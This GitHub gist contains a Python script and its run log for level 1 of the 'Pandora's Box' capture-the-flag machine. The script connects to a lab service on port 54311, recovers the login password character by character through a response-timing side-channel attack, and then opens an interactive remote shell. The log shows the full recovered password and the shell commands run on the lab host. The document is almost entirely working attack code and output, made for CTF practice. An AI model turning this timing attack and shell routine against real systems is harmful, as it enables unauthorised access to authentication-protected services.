Last active
August 29, 2015 14:13
-
-
Save leonjza/4f629c26ddb37ff471f9 to your computer and use it in GitHub Desktop.
pandora_l1.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Pandoras Box | |
# Level 1 | |
import time | |
import socket | |
import string | |
import sys | |
def find_next_char(sock, current_string): | |
""" Take a current string, and perform a timing attack | |
on the Pandoras Box Level one (tcp/54311 service) | |
""" | |
# prepare the string of characters | |
# that we will be looping over | |
input_seq = string.lowercase | |
input_seq += string.uppercase | |
input_seq += string.digits | |
# set some default values for next | |
# few socket requests | |
fastest_time = sys.maxint | |
fastest_char = None | |
# start a loop over the characters | |
# in input_seq | |
for character_seq in input_seq: | |
# add the character to the current string | |
character = current_string + character_seq | |
# each character will have their response | |
# time averaged. This average will become | |
# the one we use | |
character_time = 0 | |
for i in range(5): | |
start_time = time.time() | |
sock.send(character) | |
result = sock.recv(50) | |
elapsed_time = time.time() - start_time | |
# add the time elapsed for use in the | |
# average calculation | |
character_time += elapsed_time | |
# with 5 samples, we % by 5. That will be | |
# the time sample | |
character_time = character_time/5 | |
#print 'Character %s has time of %s' % (character, character_time) | |
# if the time for the character is less than | |
# the current known fastest one, we will | |
# use that | |
if character_time < fastest_time: | |
fastest_time = character_time | |
fastest_char = character_seq | |
# after all of the characters, add the fastest | |
# to the current string | |
#print 'The fastest character was %s responding in %s' % (fastest_char, fastest_time) | |
# return the character | |
return fastest_char | |
def do_login(sock, password): | |
""" Accept a socket and password and check the response | |
when providing the password | |
""" | |
print 'Attempting login with: %s (%s)' % (password, len(password)) | |
# send the password | |
sock.send(password) | |
response = sock.recv(250) | |
# and check the response. The string 'Invalid' is | |
# present if the password is not correct | |
if 'Invalid' not in response: | |
print 'Login success with password: %s' % password | |
return True | |
return False | |
def do_shell(sock): | |
""" Start interaction with a socket, accepting commands | |
from the user. | |
""" | |
try : | |
while 1: | |
# read what we have on the socket | |
current = sock.recv(2048) | |
print current | |
# wait for a new command | |
cmd = raw_input("(py-shell) $ "); | |
sock.send(cmd + "\n"); | |
result = sock.recv(2048).strip(); | |
if not len(result) : | |
print "[+] Empty response. Dead shell / exited?" | |
sock.close(); | |
break; | |
print(result); | |
except KeyboardInterrupt: | |
print "\n[+] ^C Received, closing connection" | |
sock.close(); | |
except EOFError: | |
print "\n[+] ^D Received, closing connection" | |
sock.close(); | |
if __name__ == '__main__': | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.connect(('192.168.217.129', 54311)) | |
# grab the banner and welcome | |
banner = sock.recv(250) | |
welcome = sock.recv(250) | |
password = '' | |
while True: | |
password = password + find_next_char(sock, password) | |
# if we can login, start interaction with the shell | |
if do_login(sock, password): | |
do_shell(sock) | |
break | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@007:~/pb0x# python pandora.py | |
Attempting login with: R (1) | |
Attempting login with: R3 (2) | |
Attempting login with: R3s (3) | |
Attempting login with: R3sp (4) | |
Attempting login with: R3sp3 (5) | |
Attempting login with: R3sp3c (6) | |
Attempting login with: R3sp3ct (7) | |
Attempting login with: R3sp3ctY (8) | |
Attempting login with: R3sp3ctY0 (9) | |
Attempting login with: R3sp3ctY04 (10) | |
Attempting login with: R3sp3ctY04r (11) | |
Attempting login with: R3sp3ctY04r4 (12) | |
Attempting login with: R3sp3ctY04r4d (13) | |
Attempting login with: R3sp3ctY04r4dm (14) | |
Attempting login with: R3sp3ctY04r4dm1 (15) | |
Attempting login with: R3sp3ctY04r4dm1n (16) | |
Attempting login with: R3sp3ctY04r4dm1ni (17) | |
Attempting login with: R3sp3ctY04r4dm1niS (18) | |
Attempting login with: R3sp3ctY04r4dm1niSt (19) | |
Attempting login with: R3sp3ctY04r4dm1niSt4 (20) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t (21) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0 (22) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0r (23) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL (24) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1 (25) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1k (26) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1ke (27) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keY (28) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo (29) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4 (30) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R (31) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3 (32) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s (33) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp (34) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe (35) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec (36) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect (37) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY (38) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 (39) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 (40) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r (41) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG (42) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 (43) | |
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q (44) | |
Login success with password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q | |
Shell$ | |
(py-shell) $ ls | |
level2 | |
level2_readme.txt | |
Shell$ | |
(py-shell) $ id | |
uid=1001(level1) gid=1001(level1) groups=1001(level1) | |
Shell$ | |
(py-shell) $ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment